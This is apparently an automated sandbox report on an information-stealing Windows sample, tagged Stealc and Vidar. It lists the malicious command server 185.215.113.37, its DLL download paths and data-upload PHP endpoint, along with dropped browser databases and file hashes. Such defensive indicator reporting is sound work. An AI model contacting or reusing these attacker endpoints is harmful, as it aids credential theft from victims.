C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	0%	URL Reputation	safe
http://185.215.113.37/	100%	URL Reputation	malware
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
http://185.215.113.37/0d60be0de163924d/nss3.dll	100%	URL Reputation	malware
http://185.215.113.37	100%	URL Reputation	malware
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
http://185.215.113.37/0d60be0de163924d/mozglue.dll	100%	URL Reputation	malware
http://185.215.113.37/0d60be0de163924d/softokn3.dll	100%	URL Reputation	malware
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	100%	URL Reputation	malware
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://185.215.113.37/0d60be0de163924d/freebl3.dll	100%	URL Reputation	malware
http://185.215.113.37/e2b1563c6670f193.phpser	100%	URL Reputation	malware
http://185.215.113.37/e2b1563c6670f193.php	100%	URL Reputation	malware
http://www.sqlite.org/copyright.html.	0%	URL Reputation	safe
https://mozilla.org0/	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	0%	URL Reputation	safe
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	100%	URL Reputation	malware
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	100%	URL Reputation	malware
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
http://185.215.113.37/e2b1563c6670f193.php3	100%	URL Reputation	malware
https://support.mozilla.org	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.37/	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	true	URL Reputation: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	HCFIJKKK.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	HCFIJKKKKKFCAAAAFBKFIECAAK.0.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF	file.exe, 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmp	false		unknown
https://duckduckgo.com/ac/?q=	HCFIJKKK.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dll8	file.exe, 00000000.00000002.1951143669.00000000011A5000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpIJKKKKKFCAAAAFBKF	file.exe, 00000000.00000002.1951143669.0000000001187000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	file.exe, 00000000.00000002.1951143669.0000000001204000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1968279719.0000000029371000.00000004.00000020.00020000.00000000.sdmp, HCFIJKKKKKFCAAAAFBKF.0.dr	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	HCFIJKKK.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37	file.exe, file.exe, 00000000.00000002.1951143669.000000000112E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp	true	URL Reputation: malware	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	file.exe, 00000000.00000003.1814304852.000000001D33C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpl	file.exe, 00000000.00000002.1951143669.00000000011A5000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37O	file.exe, 00000000.00000002.1951143669.000000000112E000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dllX	file.exe, 00000000.00000002.1951143669.00000000011A5000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpCoinomi	file.exe, 00000000.00000002.1951143669.00000000011A5000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	HCFIJKKKKKFCAAAAFBKF.0.dr	false		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	HCFIJKKK.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dllJ	file.exe, 00000000.00000002.1951143669.00000000011A5000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37ECFHDB--	file.exe, 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpser	file.exe, 00000000.00000002.1951143669.00000000011A5000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phption:	file.exe, 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp	true		unknown
http://185.215.113.37/s	file.exe, 00000000.00000002.1951143669.0000000001187000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpf	file.exe, 00000000.00000002.1951143669.00000000011A5000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dllY$~	file.exe, 00000000.00000002.1951143669.000000000112E000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dllk$l	file.exe, 00000000.00000002.1951143669.000000000112E000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpd	file.exe, 00000000.00000002.1951143669.0000000001178000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	file.exe, 00000000.00000002.1951143669.0000000001204000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1968279719.0000000029371000.00000004.00000020.00020000.00000000.sdmp, HCFIJKKKKKFCAAAAFBKF.0.dr	false		unknown
http://www.sqlite.org/copyright.html.	file.exe, 00000000.00000002.1963134690.000000001D43D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1971368828.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.mozilla.com/en-US/blocklist/	file.exe, 00000000.00000002.1971760211.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	false		unknown
https://mozilla.org0/	freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY	file.exe, 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp	false		unknown
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	file.exe, 00000000.00000002.1951143669.0000000001204000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1968279719.0000000029371000.00000004.00000020.00020000.00000000.sdmp, HCFIJKKKKKFCAAAAFBKF.0.dr	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	HCFIJKKK.0.dr	false		unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dllf	file.exe, 00000000.00000002.1951143669.0000000001187000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV	file.exe, 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	HCFIJKKK.0.dr	false	URL Reputation: safe	unknown
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	file.exe, 00000000.00000002.1951143669.0000000001204000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1968279719.0000000029371000.00000004.00000020.00020000.00000000.sdmp, HCFIJKKKKKFCAAAAFBKF.0.dr	false		unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	file.exe, file.exe, 00000000.00000003.1814304852.000000001D33C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm	file.exe, 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmp	false		unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17t	file.exe, 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmp	false		unknown
https://www.ecosia.org/newtab/	HCFIJKKK.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpE	file.exe, 00000000.00000003.1835678822.00000000011FB000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	HCFIJKKKKKFCAAAAFBKFIECAAK.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpIJKKKKKFCAAAAFBKFy	file.exe, 00000000.00000002.1951143669.0000000001187000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/nss3.dllI	file.exe, 00000000.00000002.1951143669.0000000001172000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://ac.ecosia.org/autocomplete?q=	HCFIJKKK.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dllr	file.exe, 00000000.00000002.1951143669.00000000011A5000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000002.1951143669.0000000001204000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1968279719.0000000029371000.00000004.00000020.00020000.00000000.sdmp, HCFIJKKKKKFCAAAAFBKF.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.php4	file.exe, 00000000.00000002.1951143669.0000000001178000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.php3	file.exe, 00000000.00000002.1951143669.00000000011A5000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dlln	file.exe, 00000000.00000002.1951143669.00000000011A5000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://support.mozilla.org	HCFIJKKKKKFCAAAAFBKFIECAAK.0.dr	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	HCFIJKKK.0.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.37	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1541395
Start date and time:	2024-10-24 19:28:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/22@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 86% Number of executed functions: 75 Number of non-executed functions: 48
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.37	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.37/e2b1563c6670f193.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	fXg8zgxVTF.exe	Get hash	malicious	Stealc, Vidar	Browse
	T220UXIoKO.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	g4Cyr2T5jq.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Stealc, Vidar	Browse
	NK3SASJheq.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
C:\ProgramData\mozglue.dll	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	fXg8zgxVTF.exe	Get hash	malicious	Stealc, Vidar	Browse
	T220UXIoKO.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	g4Cyr2T5jq.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Stealc, Vidar	Browse
	NK3SASJheq.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\FIEHIIIJDAAAAAAKECBFBAEBKJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HCFIJKKK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HCFIJKKKKKFCAAAAFBKF

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9571
Entropy (8bit):	5.536643647658967
Encrypted:	false
SSDEEP:	192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5:	5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1:	72332A8A92B77A8B1E3AA00893D73FC2704B0D13
SHA-256:	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512:	57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\HCFIJKKKKKFCAAAAFBKFIECAAK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HIDGCFBFBFBKEBGCAFCG

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IJDHCBGHJEGHJJKFHIIEHJJEBF

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IJKFCFHJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KKKJKEBKFCAAECAAAAAE

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
